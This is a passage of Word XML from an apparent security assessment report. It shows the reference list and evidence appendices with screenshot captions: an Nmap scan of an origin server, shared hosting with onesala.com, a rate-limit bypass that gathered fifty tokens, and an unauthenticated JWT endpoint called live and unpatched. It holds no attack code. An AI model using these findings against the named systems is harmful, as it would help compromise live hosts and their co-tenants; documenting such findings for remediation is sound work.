      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">8.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MikroTik. (2024). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RouterOS Security Hardening Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. MikroTik Documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">9.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST. (2008). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Technical Guide to Information Security Testing and Assessment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SP 800-115). National Institute of Standards and Technology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2021). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP Web Security Testing Guide v4.2</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11.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2021). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP Top Ten 2021</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. OWASP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">12.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CORS Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. OWASP Cheat Sheet Series.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">13.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing Execution Standard (PTES). (2014). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PTES Technical Guidelines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. http://www.pentest-standard.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">14.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 7489. (2015). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Domain-based Message Authentication, Reporting, and Conformance (DMARC)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. IETF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">15.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sheffer, Y., Hardt, D., &amp; Jones, M. (2020). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JSON Web Token Best Current Practices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RFC 8725). IETF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">16.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stuttard, D., &amp; Pinto, M. (2011). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2nd ed.). Wiley.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">17.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Van den Berg, R. (2019). Bypassing rate limiting using HTTP header manipulation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DEF CON 27 Talk Proceedings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">18.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Verizon. (2024). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2024 Data Breach Investigations Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. Verizon Business.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>APPENDICES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix A: Nmap Scan Output — Origin Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="3908898"/>
            <wp:docPr id="40" name="Picture 40"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig49_nmap.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="3908898"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure A.1: Nmap full port scan — origin server (twenty-three open ports confirmed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Full TCP port scan conducted against the origin server, confirming twenty-three open ports including administrative interfaces that should not be publicly accessible from the internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix B: SSL Certificate Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="959680"/>
            <wp:docPr id="41" name="Picture 41"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig48b_ssl_onesala.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="959680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure B.1: SSL certificate showing onesala.com on same origin server — shared hosting confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SSL certificate inspection of the origin server confirming multiple co-hosted domains, including onesala.com. This evidence supports findings N-004 (Shared Hosting Lateral Movement Risk) and N-020 (Co-Tenant Confirmed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix C: Rate Limit Bypass Test Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2583063"/>
            <wp:docPr id="42" name="Picture 42"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig415_ratelimit_30requests.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2583063"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure C.1: Thirty consecutive HTTP 200 responses — rate limiting not active</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2168250"/>
            <wp:docPr id="43" name="Picture 43"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig415b_ratelimit_bypass.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2168250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure C.2: Rate limit bypass confirmation — fifty tokens collected with zero rate-limit responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTTP response evidence from the rate limit bypass exploitation. All fifty requests returned HTTP 200 with zero rate-limit responses triggered, confirming a 100% bypass rate as documented in finding N-005.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix D: JWT Token Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2313134"/>
            <wp:docPr id="44" name="Picture 44"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig415_jwt_token_burp.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2313134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure D.1: JWT token response captured in Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="533199"/>
            <wp:docPr id="45" name="Picture 45"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig415b_jwt_token.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="533199"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure D.2: JWT token decoded — header and payload structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="998595"/>
            <wp:docPr id="46" name="Picture 46"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig416_jwt_404.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="998595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure D.3: JWT endpoint returning HTTP 200 — confirmed live and unpatched</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JWT token captured in Burp Suite, decoded token structure, and live endpoint confirmation. Supports findings N-005 (Rate Limit Bypass) and N-007 (Unauthenticated JWT Token Issuance).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix E: Additional Technical Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2651937"/>
            <wp:docPr id="47" name="Picture 47"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig417_whm_browser.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2651937"/>
                    </a:xfrm>
